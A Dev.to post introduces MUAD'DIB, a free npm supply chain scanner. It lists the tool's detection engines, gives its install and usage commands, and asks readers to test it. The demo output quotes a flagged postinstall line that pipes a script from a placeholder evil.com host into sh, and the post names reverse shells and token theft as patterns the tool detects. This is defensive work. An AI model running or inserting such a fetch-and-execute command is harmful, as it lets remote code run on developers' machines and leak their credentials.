I built a free npm supply chain scanner - looking for testers
Source: Dev.to
Last year, a single malicious npm package compromised over 25,000 repositories. The attack was simple: publish a package with a name close to a popular one, add a postinstall script that steals tokens, and wait.
I built MUAD’DIB to catch this kind of thing before it hits your project. It’s free, open‑source, and I’m looking for people to break it.
What it does
MUAD’DIB scans your node_modules and project files for signs of malicious code. It doesn’t rely only on known bad packages – it actually reads the code and looks for suspicious behavior.
9 detection engines run in parallel:
- AST analysis – parses JavaScript with Acorn and flags dangerous patterns (e.g.,
evalwith dynamic arguments,child_processspawning, credential access). - Dataflow tracking – connects the dots between reading a sensitive file and sending it over HTTP.
- Shell pattern detection – catches
curl | sh, reverse shells, and destructive commands in npm scripts. - Typosquatting – flags dependencies that look like popular packages (Levenshtein distance).
- Obfuscation detection – spots hex encoding, single‑char variables,
_0xpatterns. - IOC matching – compares against 1,500+ known malicious package signatures.
- Hash verification – SHA‑256 matching against known malware files.
- Package metadata – analyzes
package.jsonfor suspicious lifecycle scripts. - GitHub Actions – detects injection vulnerabilities in workflow files.
Quick demo
npx muaddib-scanner scan .[SCORE] 78/100 [████████████████░░░░] DANGEROUS
CRITICAL: postinstall_script
-> curl http://evil.com/steal.sh | sh
Playbook: Remove the package immediately. Check ~/.npmrc
and environment variables for leaked tokens.The tool runs locally, requires no account, API key, or quota. It returns a risk score (0‑100), a threat breakdown, and response playbooks.
How to use it
CLI
npm install -g muaddib-scanner
muaddib scan ./my-project
muaddib scan ./my-project --paranoid # flags everything suspicious
muaddib scan ./my-project --json # machine‑readable outputSafe install (checks before installing)
muaddib install some-packagePre‑commit hook (blocks commits with threats)
muaddib init-hooksGitHub Action
- uses: DNSZLSK/muad-dib@master
with:
scan_path: '.'
fail_on: 'high'VS Code extension
Search for “MUAD’DIB” in the VS Code Marketplace or install directly from the marketplace link.
What I’m looking for
I’ve tested MUAD’DIB against 15 simulated attack scenarios (100 % detection) and 56 fuzz vectors (0 crashes), but lab conditions aren’t production. I need real‑world feedback on:
- False positives – Did it flag something legitimate? What was it?
- Missed threats – Did you find something suspicious that MUAD’DIB didn’t catch?
- Usability – Was the output clear? Did the playbooks help?
- Performance – How long did it take on large projects? Any hangs?
If you find anything, please open an issue on the GitHub repo or leave a comment.
The numbers
| Metric | Value |
|---|---|
| Detection engines | 9 |
| Known malicious signatures | 1,500+ |
| Unit tests | 145 |
| Fuzz tests | 56 |
| Code coverage | 80 % |
| Adversarial detection rate | 15/15 (100 %) |
| Security audit findings | 58 found, 58 fixed |
| Dependencies with CVEs | 0 |
| Price | Free forever |
The full security audit report is available in the repository.
Why not just use Snyk/Socket?
You should – they’re great tools. MUAD’DIB isn’t trying to replace them, but it offers:
- No account required
- No rate limits or quotas
- Fully offline operation after install
- Built‑in response playbooks, not just alerts
- Open‑source and auditable
- Works as a pre‑commit hook, GitHub Action, and VS Code extension
For a quick check on a side project, npx muaddib-scanner scan . finishes in about 3 seconds.
Try it
npx muaddib-scanner scan .Tell me what breaks.